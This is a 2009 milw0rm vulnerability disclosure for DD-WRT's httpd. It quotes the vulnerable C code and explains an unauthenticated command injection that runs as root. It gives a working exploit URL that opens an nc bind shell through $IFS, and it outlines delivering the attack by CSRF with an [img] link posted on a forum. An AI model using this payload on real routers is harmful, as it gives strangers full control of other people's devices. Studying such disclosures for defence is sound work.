103 lines
No EOL
3.4 KiB
Text
103 lines
No EOL
3.4 KiB
Text
This is a remote root vulnerability in DD-WRT's httpd server. The bug exists
|
|
at the latest 24 sp1 version of the firmware.
|
|
|
|
The problem is due to many bugs and bad software design decisions. Here is
|
|
part of httpd.c:
|
|
|
|
859 if (containsstring(file, "cgi-bin")) {
|
|
860
|
|
861 auth_fail = 0;
|
|
862 if (!do_auth
|
|
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
|
|
864 authorization, auth_check))
|
|
865 auth_fail = 1;
|
|
|
|
|
|
......... (snip)............
|
|
|
|
899
|
|
900 }
|
|
901 exec = fopen("/tmp/exec.tmp", "wb");
|
|
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
|
|
903 if (query)
|
|
904 fprintf(exec, "/bin/sh %s/%s</tmp/exec.query\n",
|
|
905 server_dir != NULL ?
|
|
server_dir : "/www",file);
|
|
906 else
|
|
907 fprintf(exec, "/%s/%s\n",
|
|
908 server_dir != NULL ? server_dir : "/www",
|
|
file);
|
|
909 fclose(exec);
|
|
910
|
|
911 if (query) {
|
|
912 exec = fopen("/tmp/exec.query", "wb");
|
|
913 fprintf(exec, "%s\n", query);
|
|
|
|
........................
|
|
Two issues there:
|
|
1) No metacharacters handling
|
|
2) Command gets executed even without successful authentication.
|
|
You are not going to see any output if not authenticated though.
|
|
.......................
|
|
|
|
914 free(query);
|
|
915 fclose(exec);
|
|
916 }
|
|
917
|
|
918 system2("chmod 700 /tmp/exec.tmp");
|
|
919 system2("/tmp/exec.tmp>/tmp/shellout.asp");
|
|
|
|
........... (snip)..........
|
|
|
|
926 if (auth_fail == 1) {
|
|
927 send_authenticate(auth_realm);
|
|
928 auth_fail = 0;
|
|
|
|
------------
|
|
|
|
3) issue 3: httpd runs as root :)
|
|
|
|
|
|
|
|
Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
|
|
connect to the management web interface can get easily root on the device via
|
|
his browser with an URL like:
|
|
|
|
http://routerIP/cgi-bin/;command_to_execute
|
|
|
|
There is a catch though: whitespaces break it. Anyway, they can be easily
|
|
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
|
|
becomes as easy as typing this in your browser's url bar:
|
|
|
|
http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
|
|
|
|
|
|
Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
|
|
problem:
|
|
http://www.youtube.com/watch?v=UhDcXCVFrvM
|
|
|
|
|
|
Fortunately, httpd by default does not listen on the outbound interface.
|
|
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
|
|
device's owner does not even need to have an authenticated session on the web
|
|
UI which is bad, bad). However, a base authentication dialog will appear. In
|
|
IE even this can be supressed, see this one:
|
|
|
|
http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/
|
|
|
|
Unlike the already documented CSRF vulnerability (
|
|
https://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
|
|
session. This means someone can even post some crafted [img] link on a forum
|
|
and a dd-wrt router owner visiting the forum will get owned :)
|
|
|
|
|
|
A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
|
|
would say :)
|
|
|
|
|
|
Thanks krassyo at krassyo.info for his support :)
|
|
|
|
|
|
Leka vecher :)
|
|
|
|
# milw0rm.com [2009-07-20] |